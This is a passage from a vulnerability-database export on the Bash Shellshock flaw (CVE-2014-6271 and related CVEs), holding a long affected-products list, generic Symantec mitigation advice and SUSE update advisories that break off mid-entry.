Compression Appliance 3.8.0 \n * IBM Real-time Compression Appliance 3.9.1 \n * IBM Real-time Compression Appliance 4.1.2 \n * IBM SAN Volume Controller \n * IBM SDN for Virtual Environments 1.0 \n * IBM SDN for Virtual Environments 1.1 \n * IBM SDN for Virtual Environments 1.2 \n * IBM Scale Out Network Attached Storage 1.4.3.0 \n * IBM Scale Out Network Attached Storage 1.4.3.1 \n * IBM Scale Out Network Attached Storage 1.4.3.2 \n * IBM Scale Out Network Attached Storage 1.4.3.3 \n * IBM Scale Out Network Attached Storage 1.4.3.4 \n * IBM Security Access Manager For Web 8.0 Firmware 8.0.0.2 \n * IBM Security Access Manager for Mobile 8.0.0.0 \n * IBM Security Access Manager for Mobile 8.0.0.1 \n * IBM Security Access Manager for Mobile 8.0.0.3 \n * IBM Security Access Manager for Mobile 8.0.0.4 \n * IBM Security Access Manager for Mobile 8.0.0.5 \n * IBM Security Access Manager for Web 7.0 \n * IBM Security Access Manager for Web 7.0.0.1 \n * IBM Security Access Manager for Web 7.0.0.2 \n * IBM Security Access Manager for Web 7.0.0.3 \n * IBM Security Access Manager for Web 7.0.0.4 \n * IBM Security Access Manager for Web 7.0.0.5 \n * IBM Security Access Manager for Web 7.0.0.7 \n * IBM Security Access Manager for Web 7.0.0.8 \n * IBM Security Access Manager for Web 7.0.0.9 \n * IBM Security Access Manager for Web 8.0.0.3 \n * IBM Security Access Manager for Web 8.0.0.4 \n * IBM Security Network Intrusion Prevention System GV1000 4.3 \n * IBM Security Network Intrusion Prevention System GV1000 4.4 \n * IBM Security Network Intrusion Prevention System GV1000 4.5 \n * IBM Security Network Intrusion Prevention System GV1000 4.6 \n * IBM Security Network Intrusion Prevention System GV1000 4.6.1 \n * IBM Security Network Intrusion Prevention System GV1000 4.6.2 \n * IBM Security Network Intrusion Prevention System GV200 4.3 \n * IBM Security Network Intrusion Prevention System GV200 4.4 \n * IBM Security Network Intrusion Prevention System GV200 4.5 \n * IBM Security Network Intrusion Prevention System GV200 4.6 \n * IBM Security Network Intrusion Prevention System GV200 4.6.1 \n * IBM Security Network Intrusion Prevention System GV200 4.6.2 \n * IBM Security Network Intrusion Prevention System GX3002 4.3 \n * IBM Security Network Intrusion Prevention System GX3002 4.4 \n * IBM Security Network Intrusion Prevention System GX3002 4.5 \n * IBM Security Network Intrusion Prevention System GX3002 4.6 \n * IBM Security Network Intrusion Prevention System GX3002 4.6.1 \n * IBM Security Network Intrusion Prevention System GX3002 4.6.2 \n * IBM Security Network Intrusion Prevention System GX4002 4.3 \n * IBM Security Network Intrusion Prevention System GX4002 4.4 \n * IBM Security Network Intrusion Prevention System GX4002 4.5 \n * IBM Security Network Intrusion Prevention System GX4002 4.6 \n * IBM Security Network Intrusion Prevention System GX4002 4.6.1 \n * IBM Security Network Intrusion Prevention System GX4002 4.6.2 \n * IBM Security Network Intrusion Prevention System GX4004 4.3 \n * IBM Security Network Intrusion Prevention System GX4004 4.4 \n * IBM Security Network Intrusion Prevention System GX4004 4.5 \n * IBM Security Network Intrusion Prevention System GX4004 4.6 \n * IBM Security Network Intrusion Prevention System GX4004 4.6.1 \n * IBM Security Network Intrusion Prevention System GX4004 4.6.2 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.3 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.4 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.5 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.6 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.6.1 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5008 4.3 \n * IBM Security Network Intrusion Prevention System GX5008 4.4 \n * IBM Security Network Intrusion Prevention System GX5008 4.5 \n * IBM Security Network Intrusion Prevention System GX5008 4.6 \n * IBM Security Network Intrusion Prevention System GX5008 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5008 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.3 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.4 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.5 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.6 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5108 4.3 \n * IBM Security Network Intrusion Prevention System GX5108 4.4 \n * IBM Security Network Intrusion Prevention System GX5108 4.5 \n * IBM Security Network Intrusion Prevention System GX5108 4.6 \n * IBM Security Network Intrusion Prevention System GX5108 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5108 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.3 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.4 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.5 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.6 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5208 4.3 \n * IBM Security Network Intrusion Prevention System GX5208 4.4 \n * IBM Security Network Intrusion Prevention System GX5208 4.5 \n * IBM Security Network Intrusion Prevention System GX5208 4.6 \n * IBM Security Network Intrusion Prevention System GX5208 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5208 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.3 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.4 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.5 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.6 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.6.2 \n * IBM Security Network Intrusion Prevention System GX6116 4.3 \n * IBM Security Network Intrusion Prevention System GX6116 4.4 \n * IBM Security Network Intrusion Prevention System GX6116 4.5 \n * IBM Security Network Intrusion Prevention System GX6116 4.6 \n * IBM Security Network Intrusion Prevention System GX6116 4.6.1 \n * IBM Security Network Intrusion Prevention System GX6116 4.6.2 \n * IBM Security Network Intrusion Prevention System GX7412 4.3 \n * IBM Security Network Intrusion Prevention System GX7412 4.4 \n * IBM Security Network Intrusion Prevention System GX7412 4.5 \n * IBM Security Network Intrusion Prevention System GX7412 4.6 \n * IBM Security Network Intrusion Prevention System GX7412 4.6.1 \n * IBM Security Network Intrusion Prevention System GX7412 4.6.2 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.3 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.4 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.5 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.6 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.6.1 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.6.2 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.3 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.4 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.5 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.6 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.6.1 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.6.2 \n * IBM Security Network Intrusion Prevention System GX7800 4.3 \n * IBM Security Network Intrusion Prevention System GX7800 4.4 \n * IBM Security Network Intrusion Prevention System GX7800 4.5 \n * IBM Security Network Intrusion Prevention System GX7800 4.6 \n * IBM Security Network Intrusion Prevention System GX7800 4.6.1 \n * IBM Security Network Intrusion Prevention System GX7800 4.6.2 \n * IBM Security Proventia Network Multi-Function Security System 4.6 \n * IBM Security Virtual Server Protection for VMware 1.1 \n * IBM Security Virtual Server Protection for VMware 1.1.0.1 \n * IBM Security Virtual Server Protection for VMware 1.1.1 \n * IBM Security Virtual Server Protection for VMware 1.1.1.0 \n * IBM Smart Analytics System 1050 \n * IBM Smart Analytics System 2050 \n * IBM Smart Analytics System 5600 \n * IBM Smart Analytics System 5710 \n * IBM Smart Analytics System 7600 \n * IBM Smart Analytics System 7700 \n * IBM Smart Analytics System 7710 \n * IBM SmartCloud Entry 2.3.0 \n * IBM SmartCloud Entry 2.4.0 \n * IBM SmartCloud Entry 3.1 \n * IBM SmartCloud Entry 3.2 \n * IBM SmartCloud Provisioning 2.1 FixPack 1 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 2 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 3 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 4 Interim Fix 1 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 4 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 5 for SVA \n * IBM Starter Kit for Cloud 2.2.0 \n * IBM Storwize V3500 6.1 \n * IBM Storwize V3500 6.2 \n * IBM Storwize V3500 6.3 \n * IBM Storwize V3500 6.4 \n * IBM Storwize V3500 7.1 \n * IBM Storwize V3500 7.2 \n * IBM Storwize V3500 7.3 \n * IBM Storwize V3700 6.1 \n * IBM Storwize V3700 6.2 \n * IBM Storwize V3700 6.3 \n * IBM Storwize V3700 6.4 \n * IBM Storwize V3700 7.1 \n * IBM Storwize V3700 7.2 \n * IBM Storwize V3700 7.3 \n * IBM Storwize V5000 6.1 \n * IBM Storwize V5000 6.2 \n * IBM Storwize V5000 6.3 \n * IBM Storwize V5000 6.4 \n * IBM Storwize V5000 7.1 \n * IBM Storwize V5000 7.2 \n * IBM Storwize V5000 7.3 \n * IBM Storwize V7000 6.1 \n * IBM Storwize V7000 6.2 \n * IBM Storwize V7000 6.3 \n * IBM Storwize V7000 6.4 \n * IBM Storwize V7000 7.1 \n * IBM Storwize V7000 7.2 \n * IBM Storwize V7000 7.3 \n * IBM System Networking SAN24B-5 2498-F24 \n * IBM System Networking SAN96B-5 2498-F96 \n * IBM System Networking SAN96B-5 2498-N96 \n * IBM System Storage SAN04B-R 2005-R04 \n * IBM System Storage SAN06B-R 2498-R06 \n * IBM System Storage SAN24B-4 2498-B24 \n * IBM System Storage SAN384B 2499-192 \n * IBM System Storage SAN384B-2 2499-416 \n * IBM System Storage SAN40B-4 2498-B40 \n * IBM System Storage SAN48B-5 2498-F48 \n * IBM System Storage SAN768B 2499-384 \n * IBM System Storage SAN768B-2 2499-816 \n * IBM System Storage SAN80B-4 2498-B80 \n * IBM System Storage Storwize V7000 Unified 1.3 \n * IBM System Storage Storwize V7000 Unified 1.4 \n * IBM System Storage Storwize V7000 Unified 1.5 \n * IBM System X \n * IBM TSSC 7.0 \n * IBM TSSC 7.3 \n * IBM TSSC 7.3.15 \n * IBM TSSC 7.3.16 \n * IBM TotalStorage SAN16B-2 Fabric Switch 2005-B16 \n * IBM TotalStorage SAN256B Director Model M48 2109-M48 \n * IBM Unstructured Data Identification and Mgmt 7.5 \n * IBM Unstructured Data Identification and Mgmt 7.5.1 \n * IBM WebSphere Message Broker 8.0 \n * IBM WebSphere Process Server Hypervisor Edition 6.2 \n * IBM WebSphere Process Server Hypervisor Edition 7.0 \n * IBM WebSphere Process Server Hypervisor Edition for Novell SUSE 6.2 \n * IBM WebSphere Process Server Hypervisor Edition for Novell SUSE 7.0 \n * IBM WebSphere Process Server Hypervisor Edition for Red Hat 7.0 \n * IBM WebSphere Transformation Extender 8.4.0.0 \n * IBM WebSphere Transformation Extender 8.4.0.1 \n * IBM WebSphere Transformation Extender 8.4.0.2 \n * IBM WebSphere Transformation Extender 8.4.0.3 \n * IBM WebSphere Transformation Extender 8.4.0.4 \n * IBM WebSphere Transformation Extender 8.4.1.0 \n * IBM WebSphere Transformation Extender 8.4.1.1 \n * IBM WebSphere Transformation Extender 8.4.1.2 \n * IBM Worklight Quality Assurance 6.0 \n * IBM Workload Deployer 3.1 \n * IBM eDiscovery Identification and Collection 7.5 \n * IBM eDiscovery Identification and Collection 7.5.1 \n * IPFire IPFire 2.15 Update Core 82 \n * Juniper IDP 5.1 \n * Juniper IDP Series \n * Juniper JUNOS Space \n * Juniper Junos Space Ja1500 Appliance - \n * Juniper Junos Space Ja2500 Appliance - \n * Juniper NSM3000 Appliances 2012.2 \n * Juniper NSMXpress Appliances 2012.2 \n * Juniper Nsm3000 - \n * Juniper Nsmexpress - \n * Juniper STRM/JSA 2013.2 \n * Mageia Mageia \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * McAfee Advanced Threat Defense 3.0.0 \n * McAfee Advanced Threat Defense 3.2.0 \n * McAfee Asset Manager 6.6 \n * McAfee Asset Manager Sensor 6.0 \n * McAfee Boot Attestation Service 3.0 \n * McAfee Cloud Identity Manager 3.0 \n * McAfee Cloud Identity Manager 3.1 \n * McAfee Cloud Identity Manager 3.5.1 \n * McAfee Cloud Single Sign On 4.0.0 \n * McAfee Cloud Single Sign On 4.0.1 \n * McAfee Email Gateway 7.0 \n * McAfee Email Gateway 7.0 Patch 1 \n * McAfee Email Gateway 7.0 Patch 3 \n * McAfee Email Gateway 7.0.1 \n * McAfee Email Gateway 7.0.2 \n * McAfee Email Gateway 7.0.3 \n * McAfee Email Gateway 7.0.4 \n * McAfee Email Gateway 7.5 \n * McAfee Email Gateway 7.5 Patch 1 \n * McAfee Email Gateway 7.5 Patch 2 \n * McAfee Email Gateway 7.5.1 \n * McAfee Email Gateway 7.6 \n * McAfee Email and Web Security Appliance 5.6 \n * McAfee Firewall Enterprise Control Center 5.2.0 \n * McAfee Firewall Enterprise Control Center 5.3.0 \n * McAfee Global Threat Intelligence (GTI) Proxy 2.0 \n * McAfee MOVE Antivirus Agentless 2.0 \n * McAfee MOVE Antivirus Agentless 3.0 \n * McAfee MOVE Antivirus Agentless 3.5 \n * McAfee MOVE Antivirus Multi-platform 2.0 \n * McAfee MOVE Antivirus Multi-platform 3.5 \n * McAfee MOVE Firewall 3.5 \n * McAfee MOVE Scheduler 2.0 \n * McAfee Move 2.6 \n * McAfee Network Data Loss Prevention 9.0 \n * McAfee Network Data Loss Prevention 9.1 \n * McAfee Network Data Loss Prevention 9.2.0 \n * McAfee Network Data Loss Prevention 9.2.1 \n * McAfee Network Data Loss Prevention 9.2.2 \n * McAfee Network Data Loss Prevention 9.3 \n * McAfee Network Security Manager 6.1.15.38 \n * McAfee Network Security Manager 6.1.15.39 \n * McAfee Network Security Manager 7.1.15.6 \n * McAfee Network Security Manager 7.1.15.7 \n * McAfee Network Security Manager 7.1.5.10 \n * McAfee Network Security Manager 7.1.5.14 \n * McAfee Network Security Manager 7.1.5.15 \n * McAfee Network Security Manager 7.5.5.8 \n * McAfee Network Security Manager 7.5.5.9 \n * McAfee Network Security Manager 8.0.0 \n * McAfee Network Security Manager 8.1.7.2 \n * McAfee Network Security Manager 8.1.7.3 \n * McAfee Network Security Sensor Appliance 6.0 \n * McAfee Network Security Sensor Appliance 7.1.0 \n * McAfee Network Security Sensor Appliance 7.5.0 \n * McAfee Network Security Sensor Appliance 8.0.0 \n * McAfee Network Security Sensor Appliance 8.1.0 \n * McAfee Next Generation Firewall 5.5.0 \n * McAfee Next Generation Firewall 5.5.6 \n * McAfee Next Generation Firewall 5.5.7 \n * McAfee Next Generation Firewall 5.7.0 \n * McAfee SIEM Enterprise Security Manager 9.1 \n * McAfee SIEM Enterprise Security Manager 9.2 \n * McAfee SIEM Enterprise Security Manager 9.3 \n * McAfee SSL VPN 1.5 \n * McAfee SaaS Email Protection 1.0 \n * McAfee SaaS Web Protection 1.0 \n * McAfee Web Gateway 7.2.0.9 \n * McAfee Web Gateway 7.3.2 \n * McAfee Web Gateway 7.3.2.10 \n * McAfee Web Gateway 7.3.2.2 \n * McAfee Web Gateway 7.3.2.4 \n * McAfee Web Gateway 7.3.2.6 \n * McAfee Web Gateway 7.3.2.8 \n * McAfee Web Gateway 7.3.2.9 \n * McAfee Web Gateway 7.3.2.9. \n * McAfee Web Gateway 7.4.0 \n * McAfee Web Gateway 7.4.1 \n * McAfee Web Gateway 7.4.1.3 \n * McAfee Web Gateway 7.4.2 \n * McAfee Web Gateway 7.4.2.1 \n * Meinberg LANTIME 4.0 \n * Meinberg LANTIME 5.0 \n * Meinberg LANTIME 6.00.0 \n * Meinberg LANTIME 6.14.0 \n * Meinberg LANTIME 6.15.0 \n * NetApp Clustered Data ONTAP \n * NetApp DATA ONTAP Edge \n * NetApp Data ONTAP 7-Mode \n * NetApp FlashRay \n * NetApp OnCommand Balance \n * NetApp OnCommand Performance Manager \n * NetApp OnCommand Unified Manager for Clustered Data ONTAP \n * NetApp SnapProtect Linux MediaAgent OVA template \n * NetApp StorageGRID \n * NetApp VASA Provider for Clustered Data ONTAP \n * OpenVPN OpenVPN 2.2.29 \n * Oracle Audit Vault and Database Firewall \n * Oracle Big Data Appliance \n * Oracle Database Appliance 12.1.2 \n * Oracle Database Appliance 2 \n * Oracle Enterprise Linux 4 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle Exadata Storage Server Software \n * Oracle Exalogic \n * Oracle Exalytics \n * Oracle Key Vault \n * Oracle Linux 4 \n * Oracle Linux 5 \n * Oracle Linux 6 \n * Oracle Linux 7 \n * Oracle Solaris 10 \n * Oracle Solaris 11 \n * Oracle Solaris 11.2 \n * Oracle Solaris 8 \n * Oracle Solaris 9 \n * Oracle SuperCluster \n * Oracle VM VirtualBox 2.2 \n * Oracle VM VirtualBox 3.1 \n * Oracle VM VirtualBox 3.2 \n * Oracle VM VirtualBox 3.3 \n * Oracle Virtual Compute Appliance Software \n * Paloaltonetworks PAN-OS \n * Paloaltonetworks Panorama \n * Qnap QTS 3.0.8 \n * Qnap QTS 4.1.0 \n * Qnap QTS 4.1.1 \n * Qnap QTS 4.3.0 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop 7 \n * Redhat Enterprise Linux ELS 4 \n * Redhat Enterprise Linux EUS 5.9.z server \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node 7 \n * Redhat Enterprise Linux Long Life 5.6 server \n * Redhat Enterprise Linux Long Life 5.9.server \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server 7 \n * Redhat Enterprise Linux Server AUS 6.2 \n * Redhat Enterprise Linux Server AUS 6.4 \n * Redhat Enterprise Linux Server AUS 6.5 \n * Redhat Enterprise Linux Server EUS 6.4.z \n * Redhat Enterprise Linux Server EUS 6.5.z \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation 7 \n * Riverbed Technology Granite CORE \n * Riverbed Technology Interceptor \n * Riverbed Technology SteelCentral NetShark \n * Riverbed Technology SteelCentral Profiler \n * Riverbed Technology SteelCentral Services Controller \n * Riverbed Technology SteelHead EX \n * Riverbed Technology Steelhead \n * Slackware Slackware Linux 13.0 \n * Slackware Slackware Linux 13.1 \n * Slackware Slackware Linux 13.1 \n * Slackware Slackware Linux 13.37 \n * Slackware Slackware Linux 14.0 \n * Slackware Slackware Linux 14.1 \n * SuSE Linux Enterprise Desktop 12 \n * SuSE Linux Enterprise Server 12 \n * SuSE Linux Enterprise Software Development Kit 12 \n * SuSE Manager (for SLE 11 SP2) 1.7 \n * SuSE SUSE Linux Enterprise Server 10 SP4 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP1 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP2 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP3 \n * SuSE SUSE Linux Enterprise Server 11 SP3 for VMware \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP3 \n * SuSE SUSE Linux Enterprise Software Development Kit 11 SP3 \n * SuSE Suse Linux Enterprise Desktop 11 SP3 \n * SuSE openSUSE 12.3 \n * SuSE openSUSE 13.1 \n * SuSE openSUSE 13.2 \n * SuSE openSUSE Evergreen 11.4 \n * Symantec NetBackup Appliances 5000 1.4.4 \n * Symantec NetBackup Appliances 5030 1.4.4 \n * Symantec NetBackup Appliances 5200 1.1 \n * Symantec NetBackup Appliances 5200 2.0 \n * Symantec NetBackup Appliances 5220 2.0 \n * Symantec NetBackup Appliances 5230 2.5.2 \n * Symantec NetBackup Appliances 5230 2.5.3 \n * Symantec NetBackup Appliances 5230 2.5.4 \n * Symantec NetBackup Appliances 5230 2.6 \n * Symantec NetBackup Enterprise Server 7.0 \n * Symantec NetBackup Server 7.0 \n * Trendmicro Advanced Reporting Module (ARM) 1.5 \n * Trendmicro Advanced Reporting Module (ARM) 1.6 \n * Trendmicro Data Loss Prevention Network Monitor (DLPNM) 2.0 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.0 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.2 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.5 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 5.5 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 5.6 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 6.0 SP1 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 6.5 \n * Ubuntu Ubuntu Linux 10.04 ARM \n * Ubuntu Ubuntu Linux 10.04 Amd64 \n * Ubuntu Ubuntu Linux 10.04 I386 \n * Ubuntu Ubuntu Linux 10.04 Powerpc \n * Ubuntu Ubuntu Linux 10.04 Sparc \n * Ubuntu Ubuntu Linux 12.04 LTS amd64 \n * Ubuntu Ubuntu Linux 12.04 LTS i386 \n * Ubuntu Ubuntu Linux 14.04 LTS \n * VMWare Application Dependency Planner \n * VMWare ESX 4.0 \n * VMWare ESX 4.1 \n * VMWare ESXi \n * VMWare HealthAnalyzer 5.0 \n * VMWare Horizon DaaS Platform 5.0 \n * VMWare Horizon Workspace 1.5 \n * VMWare Horizon Workspace 1.8 \n * VMWare Horizon Workspace 1.8.1 \n * VMWare Horizon Workspace 2.0 \n * VMWare IT Business Management Suite 1.0 \n * VMWare Mirage Gateway 5.0 \n * VMWare NSX for Multi-Hypervisor 4.0.3 \n * VMWare NSX for Multi-Hypervisor 4.1.2 \n * VMWare NSX for vSphere 6.0.4 \n * VMWare NVP 3.0 \n * VMWare NVP 3.2.2 \n * VMWare Socialcast On Premise \n * VMWare Studio 2.0 \n * VMWare Studio 2.0 BETA \n * VMWare Studio 2.1 \n * VMWare TAM Data Manager \n * VMWare VMware Data Recovery 2.0.3 \n * VMWare Vcenter Converter Standalone 5.1 \n * VMWare Vcenter Converter Standalone 5.5 \n * VMWare Viewplanner 3.0 \n * VMWare Workbench 3.0 \n * VMWare vCenter Application Discovery Manager \n * VMWare vCenter Hyperic Server 5.0 \n * VMWare vCenter Infrastructure Navigator 5.0 \n * VMWare vCenter Infrastructure Navigator 5.8 \n * VMWare vCenter Log Insight 1.0 \n * VMWare vCenter Log Insight 2.0 \n * VMWare vCenter Operations Manager 5.8.1 \n * VMWare vCenter Orchestrator Appliance 4.0 \n * VMWare vCenter Orchestrator Appliance 5.0 \n * VMWare vCenter Server Appliance 5.0 \n * VMWare vCenter Server Appliance 5.0 Update 1 \n * VMWare vCenter Server Appliance 5.0 Update 2 \n * VMWare vCenter Server Appliance 5.1 \n * VMWare vCenter Server Appliance 5.1 Patch 1 \n * VMWare vCenter Server Appliance 5.1 Update 1 \n * VMWare vCenter Server Appliance 5.1.0 Update b \n * VMWare vCenter Server Appliance 5.5 \n * VMWare vCenter Server Appliance 5.5 Update 1 \n * VMWare vCenter Site Recovery Manager 5.1.1 \n * VMWare vCenter Site Recovery Manager 5.5.1 \n * VMWare vCenter Support Assistant 5.5.0 \n * VMWare vCenter Support Assistant 5.5.1 \n * VMWare vCloud Automation Center (vCAC) 6.0 \n * VMWare vCloud Automation Center Application Services 6.0 \n * VMWare vCloud Connector 2.0 \n * VMWare vCloud Director Appliance 5.0 \n * VMWare vCloud Networking and Security 5.1 \n * VMWare vCloud Networking and Security 5.1.2 \n * VMWare vCloud Networking and Security 5.1.3 \n * VMWare vCloud Networking and Security 5.1.4.2 \n * VMWare vCloud Networking and Security 5.5 \n * VMWare vCloud Networking and Security 5.5.1 \n * VMWare vCloud Networking and Security 5.5.2 \n * VMWare vCloud Networking and Security 5.5.3 \n * VMWare vCloud Usage Meter 3.0 \n * VMWare vFabric Application Director 5.0.0 \n * VMWare vFabric Application Director 5.2.0 \n * VMWare vFabric Application Director 6.0 \n * VMWare vFabric Postgres 9.1.6 \n * VMWare vFabric Postgres 9.1.9 \n * VMWare vFabric Postgres 9.2.2 \n * VMWare vFabric Postgres 9.2.4 \n * VMWare vSphere App HA 1.0 \n * VMWare vSphere Big Data Extensions 1.0 \n * VMWare vSphere Big Data Extensions 2.0 \n * VMWare vSphere Data Protection 5.0 \n * VMWare vSphere Management Assistant 5.0 \n * VMWare vSphere Replication 5.5.1 \n * VMWare vSphere Replication 5.6 \n * VMWare vSphere Storage Appliance 5.1.3 \n * VMWare vSphere Storage Appliance 5.5.1 \n * Xerox ColorQube 8700 \n * Xerox ColorQube 8900 \n * Xerox ColorQube 9301 \n * Xerox ColorQube 9302 \n * Xerox ColorQube 9303 \n * Xerox ColorQube 9393 \n * Xerox Phaser 6700 \n * Xerox Phaser 7800 \n * Xerox WorkCentre 3655 \n * Xerox WorkCentre 5735 \n * Xerox WorkCentre 5740 \n * Xerox WorkCentre 5745 \n * Xerox WorkCentre 5755 \n * Xerox WorkCentre 5945 \n * Xerox WorkCentre 5955 \n * Xerox WorkCentre 6655 \n * Xerox WorkCentre 7220 \n * Xerox WorkCentre 7225 \n * Xerox WorkCentre 7228 \n * Xerox WorkCentre 7232 \n * Xerox WorkCentre 7235 \n * Xerox WorkCentre 7238 \n * Xerox WorkCentre 7242 \n * Xerox WorkCentre 7245 \n * Xerox WorkCentre 7525 \n * Xerox WorkCentre 7530 \n * Xerox WorkCentre 7535 \n * Xerox WorkCentre 7545 \n * Xerox WorkCentre 7556 \n * Xerox WorkCentre 7755 \n * Xerox WorkCentre 7765 \n * Xerox WorkCentre 7775 \n * Xerox WorkCentre 7830 \n * Xerox WorkCentre 7835 \n * Xerox WorkCentre 7845 \n * Xerox WorkCentre 7855 \n * Xerox WorkCentre 7970 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure database servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2014-09-24T00:00:00", "published": "2014-09-24T00:00:00", "id": "SMNTC-70103", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/70103", "type": "symantec", "title": "GNU Bash CVE-2014-6271 Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:57:23", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6271"], "description": "SUSE Studio uses a pre-built containment RPM for testing purposes.\n\n This update contains a rebuild with current security fixes like e.g. bash\n shellshock fixes included.\n\n Security Issues:\n\n * CVE-2014-6271\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</a>>\n * CVE-2014-7169\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</a>>\n * CVE-2014-6277\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277</a>>\n * CVE-2014-6278\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278</a>>\n\n", "edition": 1, "modified": "2014-10-14T01:05:00", "published": "2014-10-14T01:05:00", "id": "SUSE-SU-2014:1287-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00004.html", "type": "suse", "title": "Security update for Containment-Studio (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:21:10", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and is less serious due to the\n special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_.\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally, two other security issues have been fixed:\n\n * CVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n * CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\n\n Security Issues:\n\n * CVE-2014-7169\n <<a rel=\"nofollow\" 